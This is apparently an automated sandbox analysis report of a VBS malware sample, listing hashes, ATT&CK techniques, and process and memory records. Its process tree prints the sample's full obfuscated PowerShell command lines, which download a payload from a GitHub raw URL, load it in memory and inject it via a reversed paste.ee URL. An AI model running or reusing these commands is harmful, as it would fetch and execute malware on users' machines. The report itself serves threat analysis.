dbe13428633b9203ab613d1e85a1a3968a852599ed94732bcbca94fffd8de452

General

Target

dbe13428633b9203ab613d1e85a1a3968a852599ed94732bcbca94fffd8de452.vbs
Size

486KB
MD5

11d17e5031ad380653a237003a2d93a7
SHA1

8e50bcc4c1be2b52a74e0e330bc4d5fddf443895
SHA256

dbe13428633b9203ab613d1e85a1a3968a852599ed94732bcbca94fffd8de452
SHA512

057f17598033572575fdb1734388dc6602b87491bcfdd12012916c324f313dd9210ec97b73237f7ed899a55302a32937d06493aa969138043df747a86eecddb5
SSDEEP

12288:ZD4khNMtUfuNETNPg3KOi/x1n7vgGee1qIk0hChUTvOqov6R2Ueb4Pu3/FJ+3mzT:FHtX4EiDi2

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2680	powershell.exe
4	2680	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2672	powershell.exe
2680	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2672	powershell.exe
2680	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 2672	2844	WScript.exe	31
PID 2844 wrote to memory of 2672	2844	WScript.exe	31
PID 2844 wrote to memory of 2672	2844	WScript.exe	31
PID 2672 wrote to memory of 2680	2672	powershell.exe	33
PID 2672 wrote to memory of 2680	2672	powershell.exe	33
PID 2672 wrote to memory of 2680	2672	powershell.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbe13428633b9203ab613d1e85a1a3968a852599ed94732bcbca94fffd8de452.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aW5Wb0tFLWVYcHJFc1NJb24gKCgoJ1dBaXVybCcrJyA9IHFWJysnUmh0dHBzOicrJy8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbScrJy9Ob0RldCcrJ2UnKydjdE9uL04nKydvRGV0ZScrJ2N0T24vJysncmVmcy9oZWFkcy9tYWluL0QnKydldGFoTm90aC1WLnQnKyd4dHFWUicrJzsgV0FpYmEnKydzZTYnKyc0Q28nKydudGVudCcrJyA9IChOZXctT2JqJysnZWN0ICcrJ1N5c3RlbS4nKydOZXQuV2ViQ2xpZW50KS4nKydEbycrJ3dubG9hJysnZCcrJ1MnKyd0cicrJ2luZyhXQWl1cmwpOycrJyBXQWliaW4nKydhcnlDbycrJ24nKyd0JysnZW50ID0nKycgW1N5cycrJ3RlJysnbS5Db252ZXJ0XTo6RicrJ3InKydvJysnbUJhc2U2NFMnKyd0cmluZyhXQWknKydiJysnYXNlNjQnKydDb250ZScrJ24nKyd0KTsgV0EnKydpJysnYXNzZScrJ21ibHkgPScrJyBbJysnUicrJ2VmbGVjdGlvbi5BcycrJ3NlbWJseV06OkwnKydvYWQoV0FpYicrJ2knKyduYScrJ3J5JysnQycrJ29udGUnKydudCk7IFtkbicrJ2xpJysnYi5JTy5IbycrJ21lXScrJzonKyc6VkEnKydJKGREcDAvTicrJ0J6eGIvJysnZCcrJy9lZS5ldHNhcC8vOnMnKydwJysndHRoZERwLCBkRHAnKydkZScrJ3NhdGknKyd2YWRvJysnZERwLCBkJysnRCcrJ3AnKydkZXNhdGl2YWQnKydvZERwJysnLCBkRHBkZXNhdGl2YScrJ2RvJysnZERwLCBkRHBBZCcrJ2QnKydJblAnKydyb2MnKydlcycrJ3MzMicrJ2REcCwnKycgZCcrJ0RwZERwLGREcCcrJ2REcCknKSAtY3JFUGxBY0UgICdXQWknLFtDSGFyXTM2LXJFcGxhY2UgJ3FWUicsW0NIYXJdMzkgIC1jckVQbEFjRSAgKFtDSGFyXTEwMCtbQ0hhcl02OCtbQ0hhcl0xMTIpLFtDSGFyXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "inVoKE-eXprEsSIon ((('WAiurl'+' = qV'+'Rhttps:'+'//raw.githubusercontent.com'+'/NoDet'+'e'+'ctOn/N'+'oDete'+'ctOn/'+'refs/heads/main/D'+'etahNoth-V.t'+'xtqVR'+'; WAiba'+'se6'+'4Co'+'ntent'+' = (New-Obj'+'ect '+'System.'+'Net.WebClient).'+'Do'+'wnloa'+'d'+'S'+'tr'+'ing(WAiurl);'+' WAibin'+'aryCo'+'n'+'t'+'ent ='+' [Sys'+'te'+'m.Convert]::F'+'r'+'o'+'mBase64S'+'tring(WAi'+'b'+'ase64'+'Conte'+'n'+'t); WA'+'i'+'asse'+'mbly ='+' ['+'R'+'eflection.As'+'sembly]::L'+'oad(WAib'+'i'+'na'+'ry'+'C'+'onte'+'nt); [dn'+'li'+'b.IO.Ho'+'me]'+':'+':VA'+'I(dDp0/N'+'Bzxb/'+'d'+'/ee.etsap//:s'+'p'+'tthdDp, dDp'+'de'+'sati'+'vado'+'dDp, d'+'D'+'p'+'desativad'+'odDp'+', dDpdesativa'+'do'+'dDp, dDpAd'+'d'+'InP'+'roc'+'es'+'s32'+'dDp,'+' d'+'DpdDp,dDp'+'dDp)') -crEPlAcE 'WAi',[CHar]36-rEplace 'qVR',[CHar]39 -crEPlAcE ([CHar]100+[CHar]68+[CHar]112),[CHar]34))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8818QE7XDLDMJ4BFBM5F.temp

Filesize
7KB

MD5
5c9e5fa95398badf6654d34b90e1ba4c

SHA1
1b818a54837c26b6888db26878fc799f9974116e

SHA256
dbda8428dd0c5b575f0994d064ffe50c11ac15d88edc3895cf259f69850bd301

SHA512
1f5b80fd75f7828f30a9fb9ae0a0fb327f7954bc6af2be12c7fc686f70c05bef57056e63532867974dc9fde009e878b924cdc412d1e564b087ae9b0d689f9638

Download Submit
memory/2672-4-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

Filesize
4KB

Download
memory/2672-5-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2672-7-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/2672-6-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2672-10-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/2672-9-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/2672-8-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/2672-11-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download
memory/2672-17-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing